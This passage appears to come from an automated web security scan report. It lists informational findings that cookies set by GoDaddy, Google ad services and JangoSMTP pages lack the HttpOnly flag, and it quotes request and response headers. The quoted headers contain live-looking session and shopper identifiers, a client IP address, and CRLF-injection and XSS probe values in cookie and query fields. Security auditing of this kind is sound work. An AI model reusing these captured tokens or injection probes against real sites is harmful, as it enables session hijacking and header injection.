s_sess=%20s_cc%3Dtrue%3B%20abtest%3DABTEST_20060410_bizrate%257C0%3B%20s_sq%3Ddrugstorecomglobalprod%253D%252526pid%25253Dotc%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/sites/0/icon_search.gif%252526ot%25253DIMAGE%3B; s_vi=[CS]v1|2739BCD58514B3D4-4000018C2004D12D[CE]; _br_uid_1=uid%3D5299788113416%3A; __cmbDomTm=0; __cmbU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; __cmbTpvTm=1058
Response
HTTP/1.1 302 Found/pharmacy/drugindex/rxsearch.asp?search=essSet-Cookie: STICKY=SEAWEB038P:7B1B08A6C5BF4A968C79C9BFB007FDD0:moymzk55ygfcmm45khc4ln45; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/ Set-Cookie: BIGipServerdscm_farm=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:31:37 GMT; path=/ >.drugstore.com/pharmacy/drugindex/rxsearch.asp?search=ess">here</a>.</h2>
11.56. http://www.godaddy.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:preferences1=_sid=jcwejcfjxbngwdkfvgmjwimgygceujtc&gdshop_currencyType=USD&dataCenterCode=US; domain=godaddy.com; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:18 GMT; path=/ HPBackground=DanicaImageTwo; path=/ traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=19; domain=godaddy.com; path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7
Response
HTTP/1.1 200 OKSet-Cookie: preferences1=_sid=jcwejcfjxbngwdkfvgmjwimgygceujtc&gdshop_currencyType=USD&dataCenterCode=US; domain=godaddy.com; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:18 GMT; path=/ Set-Cookie: HPBackground=DanicaImageTwo; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=19; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.57. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/Domains/Controls/JsonContent/DotTypePricing.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:29 GMT; path=/
Request
GET /Domains/Controls/JsonContent/DotTypePricing.aspx?tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1
Response
HTTP/1.1 200 OKSet-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:29 GMT; path=/ \n #pricing_table tr#table_header td#header_bg{background-image: url(http://img1.wsimg.com/fos/bkg/42293_chart_topbar.gif);backgrou...[SNIP]...
11.58. http://www.godaddy.com/Domains/Controls/JsonContent/generalPricing.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/Domains/Controls/JsonContent/generalPricing.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:30 GMT; path=/ traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /Domains/Controls/JsonContent/generalPricing.aspx?TargetDivID=general_pricing_json_content&_=1316214561887 HTTP/1.1/domains/search.aspx;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=tab=general&callback=tabFill&targetDivId=tab2&tabFill=jsonp1316214560432&_=1316214560519&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:30 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=eebc2%0d%0&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ \n .general_year_header {font-weight:bold;background-color: #DDDDDD; color:#000;text-align:center;font-size: 13px;padding:5px;}\r\n .genera...[SNIP]...
11.59. http://www.godaddy.com/domains/search.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/domains/search.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:28 GMT; path=/ traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=71bf3%0d%0&clientip=50.23.123.106&referringpath=fb691c64-72f6-4f9a-b525-0b2548cfab03&referringdomain=&split=95; domain=godaddy.com; path=/ BlueLithium_domainsearch=jauafgggzbdbdhedqdvejhcgpjbacdnd; domain=godaddy.com; path=/
Request
GET /domains/search.aspx HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:28 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=71bf3%0d%0&clientip=50.23.123.106&referringpath=fb691c64-72f6-4f9a-b525-0b2548cfab03&referringdomain=&split=95; domain=godaddy.com; path=/ Set-Cookie: BlueLithium_domainsearch=jauafgggzbdbdhedqdvejhcgpjbacdnd; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.60. http://www.godaddy.com/gdshop/site_search.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/gdshop/site_search.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:traffic=server=M1PWCORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=/
Request
POST /gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=1; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1-urlencoded
Response
HTTP/1.1 200 OKSet-Cookie: traffic=server=M1PWCORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd"><html>...[SNIP]...
11.61. http://www.godaddy.com/offers/hot-deals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:32 GMT; path=/
Request
GET /offers/hot-deals.aspx?ci=13478 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95
Response
HTTP/1.1 302 Found/offers/hot-deals2.aspx?ci=51455&isc=d0d8de1c80Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:32 GMT; path=/ >.com/offers/hot-deals2.aspx?ci=51455&isc=d0d8de1c80">here</a>.</h2>
11.62. http://www.godaddy.com/offers/hot-deals2.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals2.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/ traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /offers/hot-deals2.aspx?ci=51455 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.63. http://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/jsoncontent/recommendedoffers.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:traffic=cookies=1&referrer=http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendedoffers.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455%2c50960&callback=jsonContent._fill&targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /offers/jsoncontent/recommendedoffers.aspx?ci=51455%2c50960&callback=jsonContent._fill&targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345 HTTP/1.1/offers/hot-deals2.aspx?ci=51455;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; currency1=potableSourceStr=USD; adc1=US; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/offers/hot-deals2.aspx?ci=51455&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendedoffers.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455%2c50960&callback=jsonContent._fill&targetDivId=tab1&jsonContent._fill=jQuery15108357319077476859_1316214566272&_=1316214567345&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ :"\r\n \u003cdiv class=\"dealstitle\"\u003e\r\n \u003ch3\u003eRecommended Offers\u003c/h3\u003e\r\n \u003ch4\u003eDo more online with special savings on the products yo...[SNIP]...
11.64. http://www.godaddy.com/productadvisor/pastart.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/pastart.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/ traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=/
Request
GET /productadvisor/pastart.aspx?ci=13108 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.65. http://www.godaddy.com/productadvisor/productadvisor.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/productadvisor.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:40 GMT; path=/
Request
GET /productadvisor/productadvisor.aspx?callback=atlPrdiFillDiv&commandname=setenv¶ms=lpage HTTP/1.1;q=0.7/productadvisor/pastart.aspx?ci=13108=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:40 GMT; path=/ \u000d\u000a\u0009\u0009\u0009<div id=\"ProductAdvisorDiv\" style=\"display:block;\">\u000d\u000a\u0009\u0009\u0009\u0009<table cellspacing=\"0\" cellpadding=\"0\" border=\"0\"...[SNIP]...
11.66. http://www.googleadservices.com/pagead/aclk
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.googleadservices.com
Path:
/pagead/aclk
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:Conversion=CnFDNE4xTG9XcHpUdFMzSjZXemlBTHY0ZDMtRE5lZDFZVUNwLXliM1Iyb3JOb09DQUFRQVNnRFVMdkZ6NXdFWU1rR29BSGwzY3Y1QThnQkFhb0VGMF9RbzlzQ3FxM094OEhlTnpMSTBlai1zWTBnQXQ3chITCL2R9fKJoqsCFR5CgwodAmU9qBgBINONjqOn7dXhoQFIAQ; expires=Sun, 16-Oct-2011 15:26:34 GMT; path=/pagead/conversion/1060302565/
Request
GET /pagead/aclk?sa=L&ai=C4N1LoWpzTtS3J6WziALv4d3-DNed1YUCp-yb3R2orNoOCAAQASgDULvFz5wEYMkGoAHl3cv5A8gBAaoEF0_Qo9sCqq3Ox8HeNzLI0ej-sY0gAt7r&ved=0CAgQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgg4KGXV6rTBcSABKAAw88uL57LFh-j1ATjy4fjyBECYu8rzBA&sig=AOD64_2JtkL0Rkd1sU6F3W8jpXTZ-_2jtw&adurl=http://www.socketlabs.com/lpages/od-smtp-service%3Fctt_id%3D3448125%26ctt_adnw%3DGoogle%26ctt_kw%3DSMTP%2520server%26ctt_ch%3Dps%26ctt_entity%3Dtc%26ctt_adid%3D7890931031%26ctt_nwtype%3Dsearch%26ctt_cli%3D8x11767x88739x778008 HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 302 Found.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"Set-Cookie: Conversion=CnFDNE4xTG9XcHpUdFMzSjZXemlBTHY0ZDMtRE5lZDFZVUNwLXliM1Iyb3JOb09DQUFRQVNnRFVMdkZ6NXdFWU1rR29BSGwzY3Y1QThnQkFhb0VGMF9RbzlzQ3FxM094OEhlTnpMSTBlai1zWTBnQXQ3chITCL2R9fKJoqsCFR5CgwodAmU9qBgBINONjqOn7dXhoQFIAQ; expires=Sun, 16-Oct-2011 15:26:34 GMT; path=/pagead/conversion/1060302565/ /lpages/od-smtp-service?ctt_id=3448125&ctt_adnw=Google&ctt_kw=SMTP%20server&ctt_ch=ps&ctt_entity=tc&ctt_adid=7890931031&ctt_nwtype=search&ctt_cli=8x11767x88739x778008&gclid=CL2R9fKJoqsCFR5CgwodAmU9qA
11.67. http://www.jangosmtp.com/Free-Account.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/Free-Account.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JangoMail=Word=SMTP+server&Search=g&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver; expires=Fri, 16-Dec-2011 16:26:44 GMT; path=/
Request
GET /Free-Account.asp?s=g&kw=SMTP%20server&gclid=CKGSi_aJoqsCFRdTgwod5zgZiw HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: JangoMail=Word=SMTP+server&Search=g&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver; expires=Fri, 16-Dec-2011 16:26:44 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.68. https://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/login.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JangoMail=Word=SMTP+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=/
Request
